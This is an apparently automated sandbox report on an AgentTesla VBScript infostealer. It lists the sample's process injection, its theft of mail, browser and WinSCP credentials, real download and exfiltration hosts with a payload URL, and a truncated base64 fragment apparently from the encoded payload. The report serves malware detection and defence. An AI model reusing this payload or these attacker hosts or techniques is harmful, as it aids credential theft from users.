NKCsAAAoTDx8SOH/9//8RBHsJAAAEEQge1hEPGhIBKBYAAAYtBnMmAAAKegQRBR8o1ignAAAKExAfEzhO/f//EQwsBBEGEw0RBx8sEQ0RENaeHxQ4Nf3//ygoAAAKGjMWEQR7CgAABBEHKBMAAAYtHHMmAAAKehEEewoAAAQRBygUAAAGLQZzJgAACnoRBHsKAAAEKBkAAAYVMwZzJgAACnreSCgsAAAKFisBFkUDAAAAAgAAABQAAAAkAAAAKyoRBHsLAAAEhCgtAAAKExcXK9sRFywHERdvLgAAChYKGCvLKC8AAAoZK8PeAhcKBioAAABBHAAAAAAAAFsAAABeAwAAuQMAAEgAAAAYAAABHgIoEgAACiobMAQA7QAAAAMAABFzMAAACiUoMQAACm8yAAAKAigzAAAKKDQAAApypQAAcHKxAABwbzUAAApytQAAcHLDAABwbzUAAApyxwAAcHLTAABwbzUAAApy1wAAcHLjAABwbzUAAApy5wAAcHL5AABwbzUAAApy/QAAcHIPAQBwbzUAAApyEwEAcHIlAQBwbzUAAApyKJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00F4F198 GetUserNameW,3_2_00F4F198

        Stealing of Sensitive Information

        barindex
        Yara detected AgentTesla
        Source: Yara matchFile source: 00000003.00000002.822490552.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1236, type: MEMORYSTR
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        Source: Yara matchFile source: 00000003.00000002.822490552.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1236, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected AgentTesla
        Source: Yara matchFile source: 00000003.00000002.822490552.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1236, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts211
        Windows Management Instrumentation        		Path Interception211
        Process Injection        		1
        Disable or Modify Tools        		1
        OS Credential Dumping        		1
        Account Discovery        		Remote Services1
        Archive Collected Data        		Exfiltration Over Other Network Medium1
        Ingress Tool Transfer        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts221
        Scripting        		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts221
        Scripting        		1
        Credentials in Registry        		1
        File and Directory Discovery        		Remote Desktop Protocol1
        Data from Local System        		Exfiltration Over Bluetooth11
        Encrypted Channel        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain Accounts11
        Command and Scripting Interpreter        		Logon Script (Windows)Logon Script (Windows)2
        Obfuscated Files or Information        		Security Account Manager114
        System Information Discovery        		SMB/Windows Admin Shares1
        Email Collection        		Automated Exfiltration2
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local Accounts2
        PowerShell        		Logon Script (Mac)Logon Script (Mac)1
        Software Packing        		NTDS111
        Security Software Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer3
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script131
        Virtualization/Sandbox Evasion        		LSA Secrets1
        Process Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common211
        Process Injection        		Cached Domain Credentials131
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
        System Owner/User Discovery        		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
        Remote System Discovery        		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 830445 Sample: GJ890-1286.vbs Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 28 Snort IDS alert for network traffic 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 Yara detected AgentTesla 2->32 34 Yara detected Generic Downloader 2->34 7 wscript.exe 1 2->7         started        process3 signatures4 36 VBScript performs obfuscated calls to suspicious functions 7->36 38 Suspicious powershell command line found 7->38 40 Wscript starts Powershell (via cmd or directly) 7->40 42 Very long command line found 7->42 10 powershell.exe 14 7 7->10         started        process5 dnsIp6 20 yorkrefrigerent.md 195.178.106.125, 443, 49695 TOPHOST-MD-ASRMoldovaChisinauParis18ARO Romania 10->20 44 Writes to foreign memory regions 10->44 46 Injects a PE file into a foreign processes 10->46 14 RegSvcs.exe 2 10->14         started        18 conhost.exe 10->18         started        signatures7 process8 dnsIp9 22 hermosanairobi.com 192.81.170.3, 26, 49696 AS-UPTIMECA Canada 14->22 24 192.168.2.1 unknown unknown 14->24 26 mail.hermosanairobi.com 14->26 48 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->48 50 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->50 52 Tries to steal Mail credentials (via file / registry access) 14->52 54 2 other signatures 14->54 signatures10

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        GJ890-1286.vbs13%ReversingLabsScript-WScript.Trojan.Heuristic

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        3.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

        Domains

        SourceDetectionScannerLabelLink
        hermosanairobi.com0%VirustotalBrowse
        yorkrefrigerent.md4%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://hermosanairobi.com0%VirustotalBrowse
        http://yorkrefrigerent.md4%VirustotalBrowse
        https://yorkrefrigerent.md0%Avira URL Cloudsafe
        http://hermosanairobi.com0%Avira URL Cloudsafe
        https://yorkrefrigerent.md/public/storage_old/users/.vbb/dcos.txt0%Avira URL Cloudsafe
        http://yorkrefrigerent.md0%Avira URL Cloudsafe
        http://mail.hermosanairobi.com0%Avira URL Cloudsafe
        https://yorkrefrigerent.mdx0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        hermosanairobi.com
        		192.81.170.3
        		truetrueunknown
        yorkrefrigerent.md
        		195.178.106.125
        		truefalseunknown
        mail.hermosanairobi.com
        		unknown
        		unknownfalse
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://yorkrefrigerent.md/public/storage_old/users/.vbb/dcos.txtfalse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://yorkrefrigerent.mdpowershell.exe, 00000001.00000002.311807350.0000028B3233C000.00000004.00000800.00020000.00000000.sdmpfalse
          • 4%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.311807350.0000028B31EE1000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://hermosanairobi.comRegSvcs.exe, 00000003.00000002.822490552.0000000002BF9000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://yorkrefrigerent.mdpowershell.exe, 00000001.00000002.311807350.0000028B32329000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://mail.hermosanairobi.comRegSvcs.exe, 00000003.00000002.822490552.0000000002BF9000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://yorkrefrigerent.mdxpowershell.exe, 00000001.00000002.311807350.0000028B32336000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            192.81.170.3
            		hermosanairobi.comCanada
            		53479AS-UPTIMECAtrue
            195.178.106.125
            		yorkrefrigerent.mdRomania
            		44388TOPHOST-MD-ASRMoldovaChisinauParis18AROfalse

            Private

            IP
            192.168.2.1

            General Information

            Joe Sandbox Version:37.0.0 Beryl
            Analysis ID:830445
            Start date and time:2023-03-20 11:38:14 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 11m 3s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:7
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample file name:GJ890-1286.vbs
            Detection:MAL
            Classification:mal100.troj.spyw.evad.winVBS@6/3@3/3
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 17
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .vbs
            • Override analysis time to 240s for JS/VBS files not yet terminated

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
            • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            11:39:14API Interceptor1x Sleep call for process: powershell.exe modified
            11:39:19API Interceptor14x Sleep call for process: RegSvcs.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            192.81.170.3AWE09-6767.vbsGet hashmaliciousAgentTeslaBrowse
              GL9001-800322.vbsGet hashmaliciousAgentTeslaBrowse
                FT8900-32400.vbsGet hashmaliciousAgentTeslaBrowse
                  H709886-87979.vbsGet hashmaliciousAgentTeslaBrowse
                    NES790-456900.vbsGet hashmaliciousAgentTeslaBrowse
                      195.178.106.125AWE09-6767.vbsGet hashmaliciousAgentTeslaBrowse
                      • yorkrefrigerent.md/public/js/ppn/bko.txt

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      yorkrefrigerent.mdAWE09-6767.vbsGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.125
                      ETG9032-478000.vbsGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.125
                      GL9001-800322.vbsGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.125
                      FT8900-32400.vbsGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.125
                      H709886-87979.vbsGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.125
                      NES790-456900.vbsGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.125
                      BTR98-80435567.vbsGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.125

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      TOPHOST-MD-ASRMoldovaChisinauParis18AROAWE09-6767.vbsGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.125
                      ETG9032-478000.vbsGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.125
                      GL9001-800322.vbsGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.125
                      FT8900-32400.vbsGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.125
                      H709886-87979.vbsGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.125
                      NES790-456900.vbsGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.125
                      BTR98-80435567.vbsGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.125
                      hlks5fS71M.exeGet hashmaliciousBitRATBrowse
                      • 195.178.106.125
                      Zgd7UNKfNE.exeGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.24
                      muO4HFmzAw.exeGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.24
                      sales contract 21-22.xlsxGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.24
                      Purchase_Order_7245.xlsmGet hashmaliciousUnknownBrowse
                      • 195.178.106.125
                      iqmv5DRXUB.exeGet hashmaliciousAgentTeslaBrowse
                      • 195.178.106.145
                      AS-UPTIMECAAWE09-6767.vbsGet hashmaliciousAgentTeslaBrowse
                      • 192.81.170.3
                      GL9001-800322.vbsGet hashmaliciousAgentTeslaBrowse
                      • 192.81.170.3
                      FT8900-32400.vbsGet hashmaliciousAgentTeslaBrowse
                      • 192.81.170.3
                      H709886-87979.vbsGet hashmaliciousAgentTeslaBrowse
                      • 192.81.170.3
                      NES790-456900.vbsGet hashmaliciousAgentTeslaBrowse
                      • 192.81.170.3
                      PO20230128.exeGet hashmaliciousFormBookBrowse
                      • 192.81.170.4
                      Halkbank_Ekstre_20230120_08.pdf.exeGet hashmaliciousFormBookBrowse
                      • 192.81.170.4
                      BL-SHIPPING DOCUMENTS.exeGet hashmaliciousFormBookBrowse
                      • 192.81.170.4
                      PRE ALERT NOTICE.exeGet hashmaliciousFormBookBrowse
                      • 192.81.170.4
                      HBLMBL SHIPPING DOCS.exeGet hashmaliciousFormBookBrowse
                      • 192.81.170.4
                      N0vpYgIYpv.exeGet hashmaliciousUnknownBrowse
                      • 192.81.170.5

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      54328bd36c14bd82ddaa0c04b25ed9ad20230320.vbsGet hashmaliciousRemcosBrowse
                      • 195.178.106.125
                      Statment_201648318503.JS.jsGet hashmaliciousAsyncRATBrowse
                      • 195.178.106.125
                      Statment_1863607932.JS.jsGet hashmaliciousAsyncRATBrowse
                      • 195.178.106.125
                      edce4301c8d01cf9b904be_11074.htaGet hashmaliciousNjratBrowse
                      • 195.178.106.125
                      USfw5FZRl6.exeGet hashmaliciousAsyncRATBrowse
                      • 195.178.106.125
                      yKCcn33f2h.exeGet hashmaliciousUnknownBrowse
                      • 195.178.106.125
                      u2q8kuTQLw.exeGet hashmaliciousUnknownBrowse
                      • 195.178.106.125
                      ZNwCTgxBmg.exeGet hashmaliciousUnknownBrowse
                      • 195.178.106.125
                      QrzQycehMg.exeGet hashmaliciousUnknownBrowse
                      • 195.178.106.125
                      nEI1mR3JkL.exeGet hashmaliciousUnknownBrowse
                      • 195.178.106.125
                      6YiNky9TPM.exeGet hashmaliciousUnknownBrowse
                      • 195.178.106.125
                      UQswihazuH.exeGet hashmaliciousUnknownBrowse
                      • 195.178.106.125
                      pRXWkBf0jK.exeGet hashmaliciousUnknownBrowse
                      • 195.178.106.125
                      5q0P5eWZYD.exeGet hashmaliciousUnknownBrowse
                      • 195.178.106.125
                      xhVP34zQLe.exeGet hashmaliciousUnknownBrowse
                      • 195.178.106.125
                      GVfZfoRYGs.exeGet hashmaliciousUnknownBrowse
                      • 195.178.106.125
                      GVfZfoRYGs.exeGet hashmaliciousUnknownBrowse
                      • 195.178.106.125
                      voluptates.jsGet hashmaliciousQbotBrowse
                      • 195.178.106.125
                      C-oCSHXqI.64608475.jsGet hashmaliciousUnknownBrowse
                      • 195.178.106.125
                      SCDjv7lBbD.exeGet hashmaliciousUnknownBrowse
                      • 195.178.106.125

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):0.9260988789684415
                      Encrypted:false
                      SSDEEP:3:Nlllulb/lj:NllUb/l
                      MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                      SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                      SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                      SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:@...e................................................@..........

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ilbo13zy.j2f.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xv2hgkd3.00w.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1

                      Static File Info

                      General

                      File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Entropy (8bit):3.3357734201017686
                      TrID:
                      • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                      • MP3 audio (1001/1) 32.22%
                      • Lumena CEL bitmap (63/63) 2.03%
                      • Corel Photo Paint (41/41) 1.32%
                      File name:GJ890-1286.vbs
                      File size:634860
                      MD5:b73f50ff5bacd275282b43778180fd8e
                      SHA1:98d820b8a51989b2bf9e9982de31eccf47a54fba
                      SHA256:2dbfb717c5e54b04e5e174bc6e62f90c1609adeb52085a9d42184aadac74bf0f
                      SHA512:3385a09bdcbb504962fc4c213d7de988dc8888fa11c8af5b20c17e92b1cf6626b56fca70e25cd29e7590fb08ad93bb64804bb2d09c43e72da80f4fec445bbbc2
                      SSDEEP:1536:jAgmFXNa89nCkaNxNRfpxVp3tRcGOjr9faR:jAgmFXNajkUbR
                      TLSH:03D4E7A771BFC0D451E1752B828BF5788BFFAAD1993E3A1402CC264D5EC2B8598523D3
                      File Content Preview:..:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:

                      File Icon

                      Icon Hash:e8d69ece869a9ec4

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      192.168.2.5192.81.170.349696262851779 03/20/23-11:39:22.276555TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4969626192.168.2.5192.81.170.3

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Mar 20, 2023 11:39:14.802937984 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:14.802994013 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:14.803081036 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:14.820851088 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:14.820877075 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:14.937886953 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:14.938010931 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:14.944413900 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:14.944441080 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:14.945022106 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:14.971757889 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:14.971791983 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.069613934 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.120254993 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.120327950 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.120486975 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.120517969 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.120554924 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.120606899 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.121326923 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.121393919 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.121418953 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.121443987 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.121484995 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.121499062 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.171695948 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.171806097 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.171890974 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.171926975 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.171948910 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.172458887 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.172492027 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.172564030 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.172583103 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.172609091 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.172631979 CET44349695195.178.106.125192.168.2.5
                      Mar 20, 2023 11:39:15.172650099 CET49695443192.168.2.5195.178.106.125
                      Mar 20, 2023 11:39:15.172676086 CET49695443192.168.2.5195.178.106.125
